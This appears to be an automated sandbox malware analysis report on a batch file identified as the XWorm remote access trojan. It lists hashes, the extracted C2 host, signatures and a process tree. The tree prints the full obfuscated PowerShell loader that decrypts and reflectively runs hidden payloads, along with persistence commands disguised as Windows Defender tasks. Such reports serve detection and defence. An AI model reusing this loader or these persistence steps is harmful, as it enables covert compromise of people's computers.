Overview

overview

10

Static

static

1

WindowsSer...st.bat

windows7-x64

6

WindowsSer...st.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-01-2025 22:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WindowsServiceHost.bat

  • Size

    261KB

  • MD5

    14be533a8ded237f42b2ddc0d33b276d

  • SHA1

    7293f45cd1cd11f4917f5a8abbad7fffaadbef7d

  • SHA256

    0a7fd6f7e41112d69cab8548e2eb9b6605c43a31a6d69742588c91e96a23b5e1

  • SHA512

    2fa1c126da6765ab7da7663b98498a299f5d4e4c1e92a155add0040ed3e45b32e5285c88d829dc1b87394e08bf8bdba6e1c62de5c749824c69a576d3981c8b1d

  • SSDEEP

    6144:vGnTkbwrZjfz5/vhQnFZTsEmGTNsqrldr31ITpjnFyAKu+:unQbwlz5/enr/vdOTRnFJV+

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

rated-obituaries.gl.at.ply.gg:15683

Mutex

rSnauVoWu1wqhFOA

Attributes
  • Install_directory

    %Public%

  • install_file

    WindowsDefenderUpdateTool.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WindowsServiceHost.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UXWEpd7nUOKlq+WXHTQepEFwM+Cpm4ywcY0Yh+bUqRw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gVgKzo1cs7k4M/3z+UgL1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fWEZS=New-Object System.IO.MemoryStream(,$param_var); $CzfBd=New-Object System.IO.MemoryStream; $CPqAb=New-Object System.IO.Compression.GZipStream($fWEZS, [IO.Compression.CompressionMode]::Decompress); $CPqAb.CopyTo($CzfBd); $CPqAb.Dispose(); $fWEZS.Dispose(); $CzfBd.Dispose(); $CzfBd.ToArray();}function execute_function($param_var,$param2_var){ $fEGTa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ruNtC=$fEGTa.EntryPoint; $ruNtC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WindowsServiceHost.bat';$DUsFS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WindowsServiceHost.bat').Split([Environment]::NewLine);foreach ($nMUEb in $DUsFS) { if ($nMUEb.StartsWith(':: ')) { $fkaFD=$nMUEb.Substring(3); break; }}$payloads_var=[string[]]$fkaFD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_889_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_889.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3180
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_889.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3456
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_889.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UXWEpd7nUOKlq+WXHTQepEFwM+Cpm4ywcY0Yh+bUqRw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gVgKzo1cs7k4M/3z+UgL1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fWEZS=New-Object System.IO.MemoryStream(,$param_var); $CzfBd=New-Object System.IO.MemoryStream; $CPqAb=New-Object System.IO.Compression.GZipStream($fWEZS, [IO.Compression.CompressionMode]::Decompress); $CPqAb.CopyTo($CzfBd); $CPqAb.Dispose(); $fWEZS.Dispose(); $CzfBd.Dispose(); $CzfBd.ToArray();}function execute_function($param_var,$param2_var){ $fEGTa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ruNtC=$fEGTa.EntryPoint; $ruNtC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_889.bat';$DUsFS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_889.bat').Split([Environment]::NewLine);foreach ($nMUEb in $DUsFS) { if ($nMUEb.StartsWith(':: ')) { $fkaFD=$nMUEb.Substring(3); break; }}$payloads_var=[string[]]$fkaFD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3472
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefenderUpdateTool" /tr "C:\Users\Public\WindowsDefenderUpdateTool.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1056
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /delete /f /tn "WindowsDefenderUpdateTool"
              6⤵
                PID:536
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp196F.tmp.bat""
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2168
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  7⤵
                  • Delays execution with timeout.exe
                  PID:2832
    • C:\Users\Public\WindowsDefenderUpdateTool.exe
      C:\Users\Public\WindowsDefenderUpdateTool.exe
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:872

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      661739d384d9dfd807a089721202900b

      SHA1

      5b2c5d6a7122b4ce849dc98e79a7713038feac55

      SHA256

      70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

      SHA512

      81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      0854dd9a92ee6b91d636302617f52547

      SHA1

      aba002629c90c6bb00b21532e7e711bdfdd602db

      SHA256

      3050fd9aac7e796cfb3e185467486faf28485325c41224ebd7dceae982e71f25

      SHA512

      b11851ccee363d566471ad37551ad08cb2aa793043b71136db8e68e804c2abd54cd774242583869984682d22b3e94679104b920a445c7409c70fc349a197950a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbw14asf.nfv.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp196F.tmp.bat
      Filesize

      171B

      MD5

      a91a810b0444911ed3be38026d168fd0

      SHA1

      1c464998e4952950ee1bbd1aa0de2a0f2220350e

      SHA256

      484af49312e7719604b4a9668b4ad01704c6a2df049c43c487d77d7fe26a7e94

      SHA512

      34151bd4a619dbbc82608b842ac915c5270cd56226db71069d17122d2ed0cbc97168856be632bfe441606daa29c9ae5c44cec13a3db4c59c74a3619c5fa242af

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_889.bat
      Filesize

      261KB

      MD5

      14be533a8ded237f42b2ddc0d33b276d

      SHA1

      7293f45cd1cd11f4917f5a8abbad7fffaadbef7d

      SHA256

      0a7fd6f7e41112d69cab8548e2eb9b6605c43a31a6d69742588c91e96a23b5e1

      SHA512

      2fa1c126da6765ab7da7663b98498a299f5d4e4c1e92a155add0040ed3e45b32e5285c88d829dc1b87394e08bf8bdba6e1c62de5c749824c69a576d3981c8b1d

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_889.vbs
      Filesize

      115B

      MD5

      493973b0411e64da5a9b93f39aededf3

      SHA1

      cbabbdc9ef61d491f5392f1065f63e614a8c3393

      SHA256

      12c50f3ffa3fdb824c25f3cd4eaf093d9685548cdca2d799c563416938e3cf22

      SHA512

      a37b0764917ed87936df6462958eddc5b9ef99d1d22b08d979ebe0fb2d564ee9aefcbcc7be95f01fdfba95209756f1324723053c451f974679428f526ba78095

      Download Submit

    • C:\Users\Public\WindowsDefenderUpdateTool.exe
      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      Download Submit

    • memory/412-12-0x00007FF9F5880000-0x00007FF9F6341000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/412-0-0x00007FF9F5883000-0x00007FF9F5885000-memory.dmp

      Filesize

      8KB

      Download

    • memory/412-14-0x00000216824E0000-0x0000021682514000-memory.dmp

      Filesize

      208KB

      Download

    • memory/412-13-0x00000216824D0000-0x00000216824D8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/412-50-0x00007FF9F5880000-0x00007FF9F6341000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/412-11-0x00007FF9F5880000-0x00007FF9F6341000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/412-7-0x00000216E6720000-0x00000216E6742000-memory.dmp

      Filesize

      136KB

      Download

    • memory/872-67-0x000001E2399B0000-0x000001E239A26000-memory.dmp

      Filesize

      472KB

      Download

    • memory/872-66-0x000001E239520000-0x000001E239564000-memory.dmp

      Filesize

      272KB

      Download

    • memory/3180-30-0x00007FF9F5880000-0x00007FF9F6341000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3180-27-0x00007FF9F5880000-0x00007FF9F6341000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3180-26-0x00007FF9F5880000-0x00007FF9F6341000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3180-25-0x00007FF9F5880000-0x00007FF9F6341000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3472-55-0x000001E26C0E0000-0x000001E26C0EC000-memory.dmp

      Filesize

      48KB

      Download

    • memory/3472-49-0x000001E26BB60000-0x000001E26BB70000-memory.dmp

      Filesize

      64KB

      Download